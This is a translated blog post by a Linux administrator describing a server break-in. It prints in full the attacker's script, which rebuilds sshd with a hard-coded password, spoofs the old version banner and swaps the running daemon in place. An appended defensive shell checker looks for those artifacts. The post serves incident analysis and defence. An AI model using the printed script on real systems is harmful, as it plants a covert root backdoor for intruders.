Is a title like this a bit perverse?!
The Linux servers over here are rock-solid, so I hadn't logged in for ages; if this mess hadn't happened, in a few more days I'd probably have forgotten the password altogether.
The hacker didn't wipe his tracks very thoroughly, or hadn't gotten around to it yet; either way, root's history still shows the commands he ran:
The NSFOCUS security advisory said long ago that OpenSSH versions below 3.6 are vulnerable (original at
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=5405
). Our system is AS4 and openssh is already version 3.9, so I assumed we wouldn't have this problem, but the problem was still there: the user got root outright, none of the restrictions I'd put in place had any effect, and what's worse, the bastard reinstalled my original openssh with a version he had modified himself. Take a look at his original install file:
#!/bin/bash
echo "bY linuxkid"
sleep 1
printf "\n\n"
printf "Enter SSH 22 password: "
read PASS
# The password typed here is compiled into the daemon as genxpass;
# genxfile is the path under /dev the backdoored build writes to.
echo 'int genx=0,genxlookup=0;'> apps/ssh/genx.h
echo 'char genxpass[]="'$PASS'",genxbuf[1024];'>> apps/ssh/genx.h
echo 'char genxfile[]="/dev/saux";'>> apps/ssh/genx.h
sleep 1
printf "\n\n"
printf "SSH Version Example: OpenSSH_3.6.1p2\n"
printf "\n\n"
printf "Enter SSH 22 version: "
read SSHV
# Rewrites ssh2includes.h so the rebuilt daemon announces the version
# string typed above (the victim's old banner) instead of its own.
echo '#ifndef SSH2INCLUDES_H'> apps/ssh/ssh2includes.h
echo '#define SSH2INCLUDES_H'>> apps/ssh/ssh2includes.h
echo '#include "sshincludes.h"'>> apps/ssh/ssh2includes.h
echo '#include "sshsessionincludes.h"'>> apps/ssh/ssh2includes.h
echo '#include "ssh2version.h"'>> apps/ssh/ssh2includes.h
echo '#define SSH_USER_RC "rc"'>> apps/ssh/ssh2includes.h
echo '#define SSH_USER_ENV_FILE "environment"'>> apps/ssh/ssh2includes.h
echo '#define SSH_SYSTEM_RC ETCDIR "/sshrc"'>> apps/ssh/ssh2includes.h
echo '#define SSH_DEFAULT_PORT "22"'>> apps/ssh/ssh2includes.h
echo '#define SSH_AUTH_PUBKEY "publickey"'>> apps/ssh/ssh2includes.h
echo '#define SSH_AUTH_PASSWD "password"'>> apps/ssh/ssh2includes.h
echo '#define SSH_AUTH_HOSTBASED "hostbased"'>> apps/ssh/ssh2includes.h
echo '#define SSH_AUTH_PAM "pam-1@ssh.com"'>> apps/ssh/ssh2includes.h
echo '#define SSH_AUTH_KERBEROS "kerberos-2@ssh.com"'>> apps/ssh/ssh2includes.h
echo '#define SSH_AUTH_KERBEROS_TGT "kerberos-tgt-2@ssh.com"'>> apps/ssh/ssh2includes.h
echo '#define SSH_AUTH_SECURID "securid-1@ssh.com"'>> apps/ssh/ssh2includes.h
echo '#define SSH_SIGNER_PATH SSH_BINDIR "/ssh-signer2"'>> apps/ssh/ssh2includes.h
echo '#define SSH_PAM_CLIENT_PATH SSH_BINDIR "/ssh-pam-client"'>> apps/ssh/ssh2includes.h
echo '#define SSH_SSH2_PATH SSH_BINDIR "/ssh2"'>> apps/ssh/ssh2includes.h
echo '#define SSH_ASKPASS_PATH SSH_BINDIR "/ssh-askpass2"'>> apps/ssh/ssh2includes.h
echo '#define SSH_LIBSOCKS5_CONF_PATH "/etc/libsocks5.conf"'>> apps/ssh/ssh2includes.h
echo '#define SSH_SERVER_DEFAULT_IDLE_TIMEOUT 0'>> apps/ssh/ssh2includes.h
echo '#define SSH2_GETOPT_ARGUMENTS "ac:C::vd:e:f::F:hi:l:L:no:p:PqR:s:Stx8gVkw1:m:"'>> apps/ssh/ssh2includes.h
echo '#define SSH2_VERSION_STRING "" SSH2_VERSION \'>> apps/ssh/ssh2includes.h
echo ' "'$SSHV'"'>> apps/ssh/ssh2includes.h
echo '#define SSH2_PROTOCOL_VERSION_STRING SSH2_VERSION \'>> apps/ssh/ssh2includes.h
echo ' "'$SSHV'"'>> apps/ssh/ssh2includes.h
echo "#endif">> apps/ssh/ssh2includes.h
echo "Done."
echo
sleep 2
echo "Installing SSH... this will take a moment...."
echo "./configure --without-x"
./configure --without-x
sleep 2
echo "make"
make
sleep 2
echo "make install"
make install
sleep 2
# Takes the path and PID of the first sshd in the process list, deletes the
# original binary, copies the freshly built daemon over that path, kills the
# old process and starts the replacement from the same path.
sshfile=`ps ax |grep sshd|head -n 1|awk ' {print $5} '`
sshpid=`ps ax |grep sshd|head -n 1|awk ' {print $1} '`
echo "rm -rf $sshfile"
rm -rf $sshfile
echo "cp -f /usr/local/sbin/sshd $sshfile"
cp -f /usr/local/sbin/sshd $sshfile
echo "kill -9 $sshpid"
kill -9 $sshpid
echo "$sshfile"
$sshfile
echo "Done."
echo "And it is all yours"
Reading the end of that nearly made me die of rage. Damn it, "it's all yours"? If you've got the guts, come carry the machine away! You can reinstall, so can I: this time I grabbed the latest version from openssh, reinstalled it over his files, and then disabled remote root login. I was going to uninstall gcc as well, but on reflection let it be; I'd like to see how much this guy has really got.
Did the same on every box that was hacked, and on the ones that weren't too, then sat there watching; once I was sure everything was fine, good, went home.
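As an added example (not part of the original post, and not the attacker's or the author's code), the POSIX shell functions below check for the artifacts the install script above leaves behind and for the root-login setting the author changed afterwards. Two things the script itself makes clear are worth keeping in mind: the rebuilt daemon announces whatever version string the installer typed in, so neither `ssh -v` nor a banner scan will show the replacement, and the header it writes (`apps/ssh/ssh2includes.h`, with `pam-1@ssh.com` and similar method names) belongs to the ssh.com SSH2 source tree rather than OpenSSH, so what ends up at the old `sshd` path is a different program entirely. The `/dev/saux` path and the `genxpass` name are taken from the script; that `genxpass` is a hard-coded password and `/dev/saux` a log file is inferred from the variable names. The `rpm -Vf` check is assumed to be available on RPM-based systems such as AS4; the sample files used for testing are constructed.

```shell
#!/bin/sh
# Added example: look for an sshd replaced in place by a rebuilt, backdoored
# daemon, and check the PermitRootLogin hardening applied afterwards.
# Assumed indicators (from the script above): /dev/saux and genxpass.

# The trojan writes to /dev/saux, which is a plain file; a legitimate /dev
# holds device nodes and directories, so a regular file there is a lead.
# -xdev keeps the walk out of /dev/shm and other mounted filesystems.
find_regular_files_in_dev() {
    find "${1:-/dev}" -xdev -type f 2>/dev/null
}

# Weak but cheap indicator: the backdoor's identifiers inside the binary.
# A rebuild could rename them, so pair this with package verification,
# e.g. `rpm -Vf /usr/sbin/sshd` on RPM systems (size/md5/mtime mismatches).
sshd_binary_has_backdoor_strings() {
    grep -a -q -e '/dev/saux' -e 'genxpass' "$1"
}

# Path the running sshd was actually exec'd from (oldest sshd = listener).
# The script copies its build over the path it found in `ps`, so compare
# this against what the package manager says it installed.
running_sshd_exe() {
    pid=$(pgrep -o -x sshd) || return 1
    readlink "/proc/$pid/exe"
}

# Effective value of an sshd_config keyword: keywords are case-insensitive,
# commented lines start with '#', and sshd keeps the first value it sees.
# (Match blocks are not handled; check them separately if present.)
sshd_config_value() {
    awk -v key="$2" 'tolower($1)==tolower(key) {print tolower($2); exit}' "$1"
}

# The hardening the author describes: remote root login refused.
# Returns 0 only if PermitRootLogin is explicitly "no"; an absent keyword
# defaults to "yes" on OpenSSH releases of that era, so it counts as open.
root_login_disabled() {
    v=$(sshd_config_value "$1" PermitRootLogin)
    [ "$v" = "no" ]
}

# Stand-alone use on a live host: sh check_sshd.sh --scan
case "${1:-}" in
--scan)
    echo "regular files under /dev:"; find_regular_files_in_dev /dev
    exe=$(running_sshd_exe) && echo "running sshd binary: $exe"
    if [ -n "$exe" ] && sshd_binary_has_backdoor_strings "$exe"; then
        echo "WARNING: backdoor strings found in $exe"
    fi
    if root_login_disabled /etc/ssh/sshd_config; then
        echo "PermitRootLogin no: ok"
    else
        echo "WARNING: remote root login is not disabled"
    fi
    ;;
esac
```

Run it with `--scan` as root; the /dev listing and the string match are leads to follow with `rpm -Vf` and a comparison of the binary against a known-good copy, not verdicts on their own.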
This article is from the ChinaUnix blog; to see the original, click: http://blog.chinaunix.net/u/29953/showart_297344.html